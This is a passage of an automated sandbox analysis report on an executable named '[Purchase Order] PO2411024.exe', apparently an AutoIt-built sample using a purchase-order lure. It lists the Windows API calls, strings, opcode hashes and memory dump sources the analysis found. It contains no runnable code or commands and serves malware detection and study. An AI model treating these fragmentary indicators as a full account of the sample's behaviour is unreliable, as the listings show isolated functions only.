                                                    • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                    • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                    • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: Combobox
                                                    • API String ID: 3850602802-2096851135
                                                    • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                    • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                    • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                    • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                    APIs
                                                    • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: LengthMessageSendTextWindow
                                                    • String ID: edit
                                                    • API String ID: 2978978980-2167791130
                                                    • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                    • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                    • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                    • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                    APIs
                                                    • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: GlobalMemorySleepStatus
                                                    • String ID: @
                                                    • API String ID: 2783356886-2766056989
                                                    • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                    • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                    • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                    • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: htonsinet_addr
                                                    • String ID: 255.255.255.255
                                                    • API String ID: 3832099526-2422070025
                                                    • Opcode ID: 336bf04b74032a76dffc0b3dec239f3a33009b0f842574d7a0c0b2a9c387c113
                                                    • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                    • Opcode Fuzzy Hash: 336bf04b74032a76dffc0b3dec239f3a33009b0f842574d7a0c0b2a9c387c113
                                                    • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                    APIs
                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: InternetOpen
                                                    • String ID: <local>
                                                    • API String ID: 2038078732-4266983199
                                                    • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                    • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                    • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                    • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: u,D
                                                    • API String ID: 4104443479-3858472334
                                                    • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                    • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                    • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                    • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • _memmove.LIBCMT ref: 00401B57
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                    • String ID: @EXITCODE
                                                    • API String ID: 2734553683-3436989551
                                                    • Opcode ID: 6671e83096f05fbf7ed832023dfd6df0aed7d84870a55488e32c5eab381b68c1
                                                    • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                    • Opcode Fuzzy Hash: 6671e83096f05fbf7ed832023dfd6df0aed7d84870a55488e32c5eab381b68c1
                                                    • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                    APIs
                                                    • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • wsprintfW.USER32 ref: 0045612A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: MessageSend_mallocwsprintf
                                                    • String ID: %d/%02d/%02d
                                                    • API String ID: 1262938277-328681919
                                                    • Opcode ID: 2f94ef12d061241edb9979ef4b8dfec1a2b2b476f2643c079f431c0c1a0d2850
                                                    • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                    • Opcode Fuzzy Hash: 2f94ef12d061241edb9979ef4b8dfec1a2b2b476f2643c079f431c0c1a0d2850
                                                    • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                    APIs
                                                    • InternetCloseHandle.WININET(?), ref: 00442663
                                                    • InternetCloseHandle.WININET ref: 00442668
                                                      • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: CloseHandleInternet$ObjectSingleWait
                                                    • String ID: aeB
                                                    • API String ID: 857135153-906807131
                                                    • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                    • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                    • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                    • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                    APIs
                                                    Strings
                                                    • ^B, xrefs: 00433248
                                                    • C:\Users\user\Desktop\[Purchase Order] PO2411024.exe, xrefs: 0043324B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _wcsncpy
                                                    • String ID: ^B$C:\Users\user\Desktop\[Purchase Order] PO2411024.exe
                                                    • API String ID: 1735881322-4211681529
                                                    • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                    • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                                                    • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                    • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                                                    APIs
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                    • PostMessageW.USER32(00000000), ref: 00441C05
                                                      • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: FindMessagePostSleepWindow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 529655941-2988720461
                                                    • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                    • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                    • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                    • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                    APIs
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                      • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: FindMessagePostSleepWindow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 529655941-2988720461
                                                    • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                    • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                    • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                    • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                    APIs
                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                      • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Message_doexit
                                                    • String ID: AutoIt$Error allocating memory.
                                                    • API String ID: 1993061046-4017498283
                                                    • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                    • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                    • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                    • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D